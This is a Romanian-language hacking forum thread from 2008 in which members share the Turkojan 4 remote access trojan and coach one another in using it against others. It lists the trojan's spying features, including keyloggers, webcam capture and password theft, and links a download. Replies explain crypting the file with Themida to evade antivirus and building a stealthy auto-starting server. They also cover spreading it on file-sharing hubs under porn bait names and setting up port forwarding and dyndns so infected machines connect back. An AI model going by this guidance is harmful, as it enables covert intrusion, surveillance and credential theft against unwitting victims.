yakuZza22 Posted February 20, 2008 Report Posted February 20, 2008 Turkojan 4 !!!!Sincer e tare....incercatiReverse ConnectionRemote Desktop(very fast)Webcam Streaming(very fast)Audio StreamingThumbnail viewerRemote passwordsMSN SnifferRemote ShellWeb-Site BlockingChat with serverSend fake messagesAdvanced file managerZipping files&foldersFind filesChange remote screen resolutionMouse managerInformation about remote computerClipboard managerIE optionsRunning ProcessService ManagerKeyboard ManagerOnline keyloggerOffline keyloggerFun MenuRegistry managerInvisible in Searching Files/Regedit/MsconfigSmall Server (100kb)Download:http://www.turkojan.com/sayac/click.php?id=10
blackdark Posted February 20, 2008 Report Posted February 20, 2008 Dupa ce postezi aiurea il mai bagi odata lol
Punisher Posted February 20, 2008 Report Posted February 20, 2008 e detectabil, presupun... cum l-ai protejat si esti sigur ca nu mai e detectabil?
yakuZza22 Posted February 21, 2008 Author Report Posted February 21, 2008 incearcal.......crypteazal cu themida doar cu de baza shi nu mai e detectabil in nici un fel....incearcaKeeP PlainG
Caracal Posted February 22, 2008 Report Posted February 22, 2008 incearcal.......crypteazal cu themida doar cu de baza shi nu mai e detectabil in nici un fel....incearcaKeeP PlainGnu prea am inteles ce ai vrut sa spui. poti sa detaliezi? am luat themida, dar ma uit chiorâs la optiunile alea cheers
Dracky2cool Posted February 22, 2008 Report Posted February 22, 2008 Am zis ca e bun, dar ca & ProRat merge decat pe PC meu, am fost personal la un vecin & nu a mers... :evil:
maniac17 Posted February 24, 2008 Report Posted February 24, 2008 zicetimi si mie cum sa il fac sa mearga ca eu trimit serveru dar nu imi gaeseste nici o gazda ..... imi zice si mie cum sa fac serverul
nike Posted February 25, 2008 Report Posted February 25, 2008 prin pppoe merge? ... si cum se configureaza ? ce port... ca dau test port la ala de e acolo ... si mi zice ca are probleme ... ii merge cuiva ... ca e super interesant prg ...
yakuZza22 Posted February 25, 2008 Author Report Posted February 25, 2008 vreti un tutorial la turkojan 4 in legatura cu crearea servarul ....ascunderea themida, packing, crypting ?????
nike Posted February 25, 2008 Report Posted February 25, 2008 daca poti sa faci u asta ... e perfect ... te rog zi mi daca merge si prin pppoe ...sau numai daca ai ip real ? ... ms mult... astept tutorialul
Caracal Posted February 25, 2008 Report Posted February 25, 2008 ca sa faceti serverul, dati la "editor". la address bagati ip-ul vostru, portul ramane asa, delay la fel, iar la username scrieti ce vreti. setati "stealth mode" si bifati tot de la "other settings". mai bifati si "autostart server" si dati save. o sa va intrebe unde vreti sa-l salvati si cu ce nume. fisierul executabil creat il dati cuiva. cand il executa, o sa se conecteze el la voi (la turkojan). mi se pare super tare. are optiuni de aflat parolele la instant messengere, ftp-uri, parolele salvate in browsere, daca are webcam poti sa vezi si sa si inregistrezi. ce mi se pare frumos e ca are si keylogger. dupa ce ai intrat la el, poti sa dai la manage keyboard->offline keyboard->get logs si va arata tot ce a scris el de cand a executat serverul super tare. daca citeati help-ul din hompage, intelegeati cum se foloseste cheers
staticxx Posted February 25, 2008 Report Posted February 25, 2008 un tutorial ar fi ideal daca ai timp si chef, pt cei care vor sa invete
go_sword Posted February 25, 2008 Report Posted February 25, 2008 daca poti sa faci u asta ... e perfect ... te rog zi mi daca merge si prin pppoe ...sau numai daca ai ip real ? ... ms mult... astept tutorialulmerge pe orice tip de net
Caracal Posted February 25, 2008 Report Posted February 25, 2008 un tutorial ar fi ideal daca ai timp si chef, pt cei care vor sa invetetimp si chef am, si as face tutorial video, dar nu prea ma pricep inregistrez cu hypercam, dar nu am unde sa postez filmuletul. unul de 1 minut, imi ocupa vreo 3 mega de scris...nu stiu ce as putea sa scriu ca sa completez ce am spus mai sus. daca mai e ceva ce nu stii, intreaba ah, si de raspindit il raspandesti foarte usor pe dc, punandu-i si niste nume atragatoare gen "xxx pamela andreson" and shit like that am ip-uri si din strainatate...foarte tarecheers
nike Posted February 25, 2008 Report Posted February 25, 2008 nu reusesc sa l fac.. nu mi merge... ia zi mi cand dai la local tools ...la port tester si dai test ... ce ti zice ?? mie mi da port has a problem ... de la aia sa fie ?? a mai reusit cineva sa faca ceva cu prg asta ? ... eu am conexiune prin pppoe... deci am un ip alocat de server ... nu am ip real ... a reusit cineva sa l foloseasca pe pppoe??/
puidehacker Posted February 25, 2008 Report Posted February 25, 2008 mist`o program`u mie imi merge...dar este detectabil...krs..il detecteaza cu ushurintza...ms pt progr...
staticxx Posted February 26, 2008 Report Posted February 26, 2008 mist`o program`u mie imi merge...dar este detectabil...krs..il detecteaza cu ushurintza...ms pt progr...e genial programu...doar krs il detecteaza, bitu nu, nodu nu...si am mai testat pe altii cu zone alarm...etc...si nu este detectabil...superb program doamne. M-am distrat!
go_sword Posted February 26, 2008 Report Posted February 26, 2008 nu reusesc sa l fac.. nu mi merge... ia zi mi cand dai la local tools ...la port tester si dai test ... ce ti zice ?? mie mi da port has a problem ... de la aia sa fie ?? a mai reusit cineva sa faca ceva cu prg asta ? ... eu am conexiune prin pppoe... deci am un ip alocat de server ... nu am ip real ... a reusit cineva sa l foloseasca pe pppoe??/da ma omule,nu am zis mai sus ca merge ?!romtel3c0mu masii...
nike Posted February 26, 2008 Report Posted February 26, 2008 am vazut ca mi ai zis...dar eu nu am reusit sa l fac sa mearga ... treaba e ca vreau sa puna cineva aici cum a facut concret .. si sa mi zica de porturile alea daca stie ... de ce nu mi merg ... ms
go_sword Posted February 26, 2008 Report Posted February 26, 2008 nu iti merge pt ca nu ai porturile deschise,intra pe speedtouch.lan-->toolbox-->game & application sharing-->assign a game or application to a local device-->create a new game or application-->scrii numele si bifezi manual entry of port maps-->scrii la port range de la cat la cat sa iti deschida(in functie de setarile trojanului) si dai add.de exemplu 65000-65010,o sa ai porturile 65001,65002...65010 deschise.ps:iti recomand sa iti faci un cont pe dyndns.org.deduci tu de ce am zis asta...bafta
Caracal Posted February 26, 2008 Report Posted February 26, 2008 am vazut ca mi ai zis...dar eu nu am reusit sa l fac sa mearga ... treaba e ca vreau sa puna cineva aici cum a facut concret .. si sa mi zica de porturile alea daca stie ... de ce nu mi merg ... msdeschizi porturile din interfata modem-ului. cont pe dyndns.org trebuie sa-ti faci pentru ca ai ip dinamic si o sa-ti mearga decat prima data. dupa ce ti se aloca alt ip, nu mai merge faci ceva de genul nike.mine.nu sau cum vrei tu si il bagi la address (acolo cand dai "editor" ca sa faci server-ul)cheers